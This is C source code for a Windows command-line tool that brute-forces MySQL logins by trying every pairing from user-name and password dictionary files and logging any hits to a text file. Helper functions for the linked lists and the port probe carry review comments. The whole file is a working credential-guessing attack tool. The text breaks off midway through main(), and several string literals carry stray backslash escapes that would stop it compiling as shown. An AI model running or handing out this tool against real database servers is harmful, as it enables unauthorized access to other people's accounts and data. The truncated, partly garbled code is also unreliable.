/* Program 1: a MySQL password brute-force tool built on linked lists; based on
 * zhouzhen@gmail.com's program with some modifications. Windows-only (Winsock +
 * libmySQL). The dictionary buffers are declared as TCHAR but are filled with the
 * narrow char APIs (fgets/strncpy), so a non-UNICODE build is assumed. */
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
#include <string.h>
#include "F:\pt007\f\database\mysql\mysql_pwd_crack\include\mysql.h"
// Link against WS2_32.LIB and the MySQL client library:
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "libmySQL.lib")
// Linked-list node types (one list of password candidates, one list of user names):
/* One password candidate in the singly-linked list built by Create_Pass_link().
 * The list starts with a dummy head whose password field is unused; real
 * entries begin at head->Next. The 100-byte buffer must stay equal to the
 * fgets() size used by LineCount() and Create_Pass_link(), which read the
 * dictionary in chunks of that size. NOTE(review): declared as TCHAR but
 * filled with narrow char calls (fgets/strncpy), so a non-UNICODE build is
 * assumed. */
typedef struct PassNode{
TCHAR password[100]; /* NUL-terminated candidate, trailing newline removed */
struct PassNode * Next; /* next candidate, NULL at the end of the list */
} PassInfo;
/* One user-name candidate in the singly-linked list built by Create_Name_link().
 * Same layout and conventions as PassNode: a dummy head node precedes the
 * entries, the buffer size must match the fgets() chunk size used when the
 * dictionary is counted and read, and a non-UNICODE build is assumed. */
typedef struct NameNode{
TCHAR Name[100]; /* NUL-terminated user name, trailing newline removed */
struct NameNode * Next; /* next name, NULL at the end of the list */
}NameInfo;
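/* Print the command-line help to stdout and terminate with exit status 1.
 * Never returns. The text describes the arguments as main() actually
 * consumes them: "-u" takes a user-name dictionary file (not a single
 * user name) and "-x" the TCP port. */
void usage(void)
{
    printf("mysql password crack v 1.0\n");
    printf("\t author:zhouzhen@gmail.com and pt007@vip.sina.com\n\n");
    printf("usage : mysql_pwd_crack [ip] [options]\n");
    printf("options:\n"
           "\t-u userdict specify the username dictionary file of mysql\n"
           "\t-x port specify the port of mysql\n"
           "\t-p password specify the password of mysql\n"
           "\t-d dict specify the dictionary (passwords with -u, see examples)\n"
           "\t-a automode automatic crack the mysql password \n"
           "\tNote: when u use the -a option, named the username dict user.dic\n"
           "\t password dict pass.dic\n");
    printf("\nexample: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic\n");
    printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic\n");
    printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -a\n");
    exit(1);
}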
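/* Size of one dictionary entry buffer. It must stay equal to the fgets()
 * size LineCount() uses (100): both count and read the file in the same
 * chunks, so an over-long line becomes several entries in both places. */
enum { DICT_ENTRY_SIZE = 100 };

/* Read one dictionary entry (at most DICT_ENTRY_SIZE-1 bytes) into dst and
 * strip a trailing "\n" or "\r\n". Returns 1 on success, 0 at end of file or
 * on a read error (dst is then an empty string).
 * This replaces the old strncpy(dst, line, strlen(line)-1) idiom, which
 * chopped the last character of a final line that has no newline and, for
 * an empty read, turned strlen()-1 into a huge copy length. */
static int read_dict_entry(char *dst, size_t cap, FILE *DictFile)
{
    dst[0] = '\0';
    if (fgets(dst, (int)cap, DictFile) == NULL)
        return 0;
    dst[strcspn(dst, "\r\n")] = '\0';
    return 1;
}

/* Build the password list: a dummy head node followed by up to NodeNum
 * entries read from DictFile (callers pass the count LineCount() returned
 * for the same stream, which also rewound it). Entries start at the returned
 * head's Next pointer. If the stream runs out early the list simply ends
 * there. On allocation failure the reason is printed and the process exits
 * with status 1. The list is never freed by the caller; it lives for the
 * whole run. */
PassInfo *Create_Pass_link(int NodeNum, FILE *DictFile)
{
    PassInfo *head = malloc(sizeof *head);
    if (head == NULL) {
        perror("malloc");
        exit(1);
    }
    head->password[0] = '\0';
    head->Next = NULL;

    PassInfo *tail = head;
    for (int i = 0; i < NodeNum; i++) {
        PassInfo *node = malloc(sizeof *node);
        if (node == NULL) {
            perror("malloc");
            exit(1);
        }
        if (!read_dict_entry(node->password, DICT_ENTRY_SIZE, DictFile)) {
            free(node);  /* dictionary shorter than the count: stop here */
            break;
        }
        node->Next = NULL;
        tail->Next = node;
        tail = node;
    }
    return head;
}

/* Build the user-name list from DictFile with exactly the same contract as
 * Create_Pass_link(): dummy head, up to NodeNum entries starting at
 * head->Next, early stop at end of file, exit(1) on allocation failure. */
NameInfo *Create_Name_link(int NodeNum, FILE *DictFile)
{
    NameInfo *head = malloc(sizeof *head);
    if (head == NULL) {
        perror("malloc");
        exit(1);
    }
    head->Name[0] = '\0';
    head->Next = NULL;

    NameInfo *tail = head;
    for (int i = 0; i < NodeNum; i++) {
        NameInfo *node = malloc(sizeof *node);
        if (node == NULL) {
            perror("malloc");
            exit(1);
        }
        if (!read_dict_entry(node->Name, DICT_ENTRY_SIZE, DictFile)) {
            free(node);  /* dictionary shorter than the count: stop here */
            break;
        }
        node->Next = NULL;
        tail->Next = node;
        tail = node;
    }
    return head;
}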
/* Count how many fgets() chunks of up to 99 bytes the stream yields from its
 * current position, then rewind it to the beginning. For a dictionary whose
 * lines are shorter than 100 characters this is the number of lines; a longer
 * line is counted once per chunk, which is exactly how Create_Pass_link() and
 * Create_Name_link() read it back, so the counts stay consistent. */
int LineCount(FILE *fd)
{
    char line[100];
    int total;

    for (total = 0; fgets(line, sizeof line, fd) != NULL; total++)
        ;
    rewind(fd);
    return total;
}
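/* TCP connect() probe. Returns TRUE when address:port accepts a connection
 * within CONNECT_TIMEOUT_SEC seconds, FALSE otherwise - including Winsock
 * setup and name-resolution failures, which are reported on stdout.
 * Winsock 1.1 is initialised and torn down on every call, and the socket is
 * always closed before returning (the original leaked it, and skipped
 * WSACleanup, on the gethostbyname/socket failure paths).
 * Note that this is a real connection attempt: the target sees a TCP
 * connect from this host before any login is tried. */
BOOL IsPortOpen(const char *address, int port)
{
    enum { CONNECT_TIMEOUT_SEC = 5 };
    WSADATA wsadata;
    SOCKET fd = INVALID_SOCKET;
    struct hostent *host1;
    struct sockaddr_in target;
    struct timeval timeout;
    fd_set writefd;
    ULONG nonblocking = 1;
    BOOL result = FALSE;
    int rc;

    /* WSAStartup reports its error in the return value, not WSAGetLastError */
    rc = WSAStartup(MAKEWORD(1, 1), &wsadata);
    if (rc != 0) {
        printf("init failed %d.\n", rc);
        return FALSE;
    }
    if (LOBYTE(wsadata.wVersion) != 1 || HIBYTE(wsadata.wVersion) != 1) {
        /* no usable winsock.dll */
        goto cleanup;
    }

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    /* SOCKET is unsigned on Windows: compare against INVALID_SOCKET instead
     * of relying on truncation into a signed int */
    if (fd == INVALID_SOCKET) {
        printf("[-] Create socket error %d. \n", WSAGetLastError());
        goto cleanup;
    }
    /* non-blocking so the connect can be bounded by select() below */
    ioctlsocket(fd, FIONBIO, &nonblocking);

    host1 = gethostbyname(address);  /* NOTE(review): legacy API, IPv4 only */
    if (host1 == NULL) {
        printf("[-] Gethostbyname(%s) error %d.\n", address, WSAGetLastError());
        goto cleanup;
    }

    memset(&target, 0, sizeof target);
    target.sin_family = AF_INET;
    target.sin_port = htons((unsigned short)port);
    target.sin_addr = *((struct in_addr *)host1->h_addr);

    rc = connect(fd, (struct sockaddr *)&target, sizeof target);
    if (rc == 0) {
        result = TRUE;  /* connected immediately */
    } else if (WSAGetLastError() == WSAEWOULDBLOCK) {
        /* connection in progress: the socket becoming writable within the
         * timeout means the handshake completed (a failure would be reported
         * on the exception set, which we do not wait for, so it times out) */
        timeout.tv_sec = CONNECT_TIMEOUT_SEC;
        timeout.tv_usec = 0;
        FD_ZERO(&writefd);
        FD_SET(fd, &writefd);
        if (select((int)fd + 1, NULL, &writefd, NULL, &timeout) > 0)
            result = TRUE;
    }
    /* any other connect error: closed or unreachable, result stays FALSE */

cleanup:
    if (fd != INVALID_SOCKET)
        closesocket(fd);
    WSACleanup();
    return result;
}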
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], \"-x\") )
usage();
if ( strcmpi(argv[4], \"-u\") )
if ( strcmpi(argv[4], \"-p\") )
usage();
if ( !strcmpi(argv[4], \"-u\") )
if ( strcmpi(argv[6], \"-d\") )
usage();
if ( !strcmpi(argv[4], \"-p\") )
if ( strcmpi(argv[6], \"-d\") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], \"-x\") )
usage();
if ( strcmpi(argv[4], \"-a\") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf(\"error:Can't connect to %s:%d\n\", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], \"-u\"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], \"r\")) ==NULL){
fprintf(stdout, \"Can't open the password dictionary\n\");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], \"r\")) ==NULL){
fprintf(stderr, \"Can't open the name dictionary\n\");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen(\"pass.txt\", \"at+\")) ==NULL){
fprintf(stdout, \"Can't write pass.txt file!\n\");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
int j=0,i=1;
while(currnode!=NULL)
{
printf(\"\n开始第%d位用户%s测试:\n\",++j,currnode->Name);
while(curr != NULL)
{
printf(\"Now cracking %s %s \n\", currnode->Name, curr->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, curr->password, \"mysql\", atoi(argv[3]), NULL, 0) )
{
printf(\"%d.Successfully:Mysql server %s's username [%s] password [%s]\n\",j,argv[1],currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部
fprintf(passtxt,\"%d.Successfully:Mysql server %s's username [%s] password [%s]\r\n\",i++,argv[1],currnode->Name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->Next;
Sleep(100);
} /* starting crack the mysql password*/
currnode = currnode->Next;
curr = head ->Next;
}
printf(\"\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n\",namecount,passcount);
printf(\"请使用\\"type pass.txt\\"来查看当前目录下的pass.txt文件!\n\");